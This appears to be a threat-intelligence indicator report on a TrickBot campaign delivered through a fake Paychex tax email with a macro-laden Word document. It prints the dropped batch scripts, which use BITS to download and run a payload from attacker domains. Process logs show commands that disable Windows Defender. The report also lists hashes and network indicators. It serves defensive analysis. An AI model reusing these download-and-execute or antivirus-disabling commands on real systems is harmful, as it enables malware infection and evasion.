#IOC #OptiData #VR #trickbot #W97M #AutoClose #BAT #BITS
https://pastebin.com/Vt02288z
previous contact:
06/02/19 https://pastebin.com/70KhU3a4
05/10/18 https://pastebin.com/75KNqwCf
02/10/18 https://pastebin.com/fm5Ug69G
24/09/18 https://pastebin.com/LjuNyGfn
FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_trickbot_051018/
https://myonlinesecurity.co.uk/fake-paychex-tax-verification-documents-delivers-trickbot/
https://github.com/DidierStevens/DidierStevensSuite/blob/master/vba.yara
attack_vector
--------------
email attach .doc > macro_AutoClose > 4 bat > BITS > GET > AppData\Roaming\wnetwork\*.exe
email_headers
--------------
Received: from paychex.email ([95.211.163.2])
Received: by paychex.email for <user00@org88.victim0.com>;
(envelope-from <J.Clark-user00=org88.victim0.com@paychex.email>)
Subject: RE: Tax verification documents
From: "Jeff Clark - Paychex" <J.Clark@paychex.email>
Date: Thu, 7 Mar 2019 14:33:37 -0500
To: user00@org88.victim0.com
files
--------------
SHA-256 a2ee9205643518f97d02ba0a70105a920c316b599755439b03f20433eecff625
File name Verification_Documents.doc [Composite Document File V2 Document, Little Endian]
File size 100.5 KB
SHA-256 da252efc670493820e953a0472959d21ca2dd85b2d4ed25b693d1ced25a02fbd
File name za.ebali [PE32 executable (GUI) Intel 80386, for MS Windows]
File size 245 KB
activity
**************
Yahhop1.bat
--------------
cmd /r cmd /c copy /Y /V %windir%\system32\bitsadmin.exe %temp%\@n10FGA.exe && %temp%\Yahhop2.bat && %temp%\Yahhop3.bat && %temp%\Yahhop4.bat
Yahhop2.bat
--------------
cmd /r cmd /c ping -n 2 yasgold{.} com
if %errorlevel%==0 (set slomw=yasgold{.} com) else (set slomw=mitreart{.} com)
Yahhop3.bat
--------------
cmd /r cmd /c %temp%\@n10FGA /reset && %temp%\@n10FGA /CREATE /DOWNLOAD Taur && %temp%\@n10FGA /setNoProgressTimeout Taur 300 && %temp%\@n10FGA /setMinRetryDelay Taur 7 && %temp%\@n10FGA /ADDFILE Taur http://%slomw%/za.ebali %temp%\ebali.exe && %temp%\@n10FGA /SetSecurityFlags Taur 30 && %temp%\@n10FGA /SETMAXDOWNLOADTIME Taur 500 && %temp%\@n10FGA /SetPeerCachingFlags Taur 3 && %temp%\@n10FGA /RESUME Taur && timeout /t 147 /nobreak && %temp%\@n10FGA /COMPLETE Taur
Yahhop4.bat
--------------
cmd /r cmd /c timeout /t 5 /nobreak && %temp%\ebali.exe && del /f /q %temp%\Yahhop1.bat %temp%\Yahhop2.bat %temp%\Yahhop3.bat %temp%\Yahhop4.bat %temp%\Yahhop5.bat %temp%\@n10FGA.exe
@
PL_SRC: http://yasgold{.} com/za.ebali
http://mitreart{.} com/za.ebali
netwrk
--------------
http
185.56.145.142 yasgold{.} com HEAD /za.ebali HTTP/1.1 Microsoft BITS/7.5
116.203.16.95 ip.anysrc.net GET /plain HTTP/1.1 Mozilla/5.0
67.27.235.254 ctldl.windowsupdate.com GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1 Microsoft-CryptoAPI/6.1
ssl
185.174.174.15
82.146.57.38
195.123.246.121
comp
--------------
svchost.exe 872 TCP localhost 49376 185.56.145.142 80 ESTABLISHED
svchost.exe 1688 TCP localhost 49377 116.203.16.95 80 ESTABLISHED
svchost.exe 1688 TCP localhost 49378 177.107.51.162 449 SYN_SENT
svchost.exe 1688 TCP localhost 49381 138.204.132.88 449 SYN_SENT
svchost.exe 1688 TCP localhost 49385 67.27.235.254 80 ESTABLISHED
svchost.exe 1688 TCP localhost 49384 185.174.174.15 443 ESTABLISHED
svchost.exe 1688 TCP localhost 49386 82.146.57.38 443 ESTABLISHED
svchost.exe 1688 TCP localhost 49389 195.123.246.121 443 ESTABLISHED
proc
--------------
1st
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\cmd.exe cmd /r cmd /c copy /Y /V %windir%\system32\bitsadmin.exe %temp%\00JO0!l.exe && %temp%\Yahhop2.bat && %temp%\Yahhop3.bat && %temp%\Yahhop4.bat
C:\Windows\SysWOW64\cmd.exe /c copy /Y /V C:\Windows\system32\bitsadmin.exe C:\tmp\00JO0!l.exe
C:\Windows\SysWOW64\cmd.exe /r cmd /c ping -n 2 yasgold{.} com
C:\Windows\SysWOW64\cmd.exe /c ping -n 2 yasgold{.} com
C:\Windows\SysWOW64\PING.EXE -n 2 yasgold{.} com
C:\Windows\SysWOW64\cmd.exe /r cmd /c C:\tmp\00JO0!l /reset
C:\Windows\SysWOW64\cmd.exe /c C:\tmp\00JO0!l /reset
C:\tmp\00JO0!l /reset
C:\tmp\00JO0!l /CREATE /DOWNLOAD Taur
C:\tmp\00JO0!l /setNoProgressTimeout Taur 300
C:\tmp\00JO0!l /setMinRetryDelay Taur 7
C:\tmp\00JO0!l /ADDFILE Taur http://yasgold{.} com/za.ebali C:\tmp\ebali.exe
C:\tmp\00JO0!l /SetSecurityFlags Taur 30
C:\tmp\00JO0!l /SETMAXDOWNLOADTIME Taur 500
C:\tmp\00JO0!l /SetPeerCachingFlags Taur 3
C:\tmp\00JO0!l /RESUME Taur
C:\Windows\SysWOW64\timeout.exe timeout /t 147 /nobreak
C:\tmp\00JO0!l /COMPLETE Taur
C:\Windows\SysWOW64\cmd.exe /r cmd /c timeout /t 5 /nobreak
C:\tmp\ebali.exe
C:\Windows\system32\cmd.exe /c sc stop WinDefend
C:\Windows\system32\cmd.exe /c sc delete WinDefend
C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
C:\Windows\system32\cmd.exe /c sc stop WinDefend
C:\Windows\system32\cmd.exe /c sc delete WinDefend
C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe
2nd
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\taskeng.exe {4A5E0F1F-7A3C-4339-A10A-8292EA54F4A0} S-1-5-21-136527031-2493574210-1221074019-1000:APM11\operator:Interactive:[1]
C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
C:\Windows\system32\cmd.exe /c sc stop WinDefend
C:\Windows\system32\cmd.exe /c sc delete WinDefend
C:\Windows\system32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\svchost.exe
persist
--------------
\Windows Network
c:\users\operator\appdata\roaming\wnetwork\ebamj.exe 07.03.2019 18:12
drop
--------------
C:\tmp\VBE\MSForms.exd
C:\tmp\Yahhop1.bat [removed]
C:\tmp\Yahhop2.bat [removed]
C:\tmp\Yahhop3.bat [removed]
C:\tmp\Yahhop4.bat [removed]
C:\tmp\00JO0!l.exe [removed]
C:\tmp\BIT7B59.tmp [removed]
C:\tmp\ebali.exe
C:\Users\operator\AppData\Roaming\wnetwork\ebamj.exe
C:\Users\operator\AppData\Roaming\wnetwork\Greenshot.ini
C:\Users\operator\AppData\Roaming\wnetwork\Data
# # #
https://www.virustotal.com/#/file/a2ee9205643518f97d02ba0a70105a920c316b599755439b03f20433eecff625/details
https://www.virustotal.com/#/file/da252efc670493820e953a0472959d21ca2dd85b2d4ed25b693d1ced25a02fbd/details
https://analyze.intezer.com/#/analyses/b11279cb-4c9a-4e59-8605-e6a96c078034
VR
@